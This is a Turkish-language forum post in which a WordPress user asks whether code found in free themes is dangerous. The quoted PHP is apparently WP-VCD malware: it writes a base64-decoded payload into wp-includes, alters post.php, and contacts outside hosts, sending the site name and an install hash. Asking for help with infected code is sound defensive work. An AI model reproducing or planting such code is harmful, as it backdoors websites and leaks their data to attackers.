Bir kaç tane ücretsiz tema beğendim. Ücretli olan temaların ücretsiz versiyonları değil(warez değil ) . ücretsiz dağıtılan temalardan yani.
ancak yine de bir kontrol edeyim dediğimde şu şekilde kodlar mevcut. sanırım host şifrelerini falan götürdüler ?

function WP_URL_CD($path)
{
if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
{
if (strpos($file, 'wp-vcd') === false) {
$file = '' . $file;
file_put_contents($path . '/wp-includes/post.php', $file);
//@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mapilo.net/admin.txt'));


başka bir dosyada yine şu var.


if ($ping) {
$content = @file_get_contents('http://www.wacocs.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.wacocs.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}

if ($ping2) {
$content = @file_get_contents('http://www.wacocs.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.wacocs.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}

}



şimdi ne yapmam gerekiyor. korkulacak kodlar değil mi yoksa sıkıntılı şeyler mi ?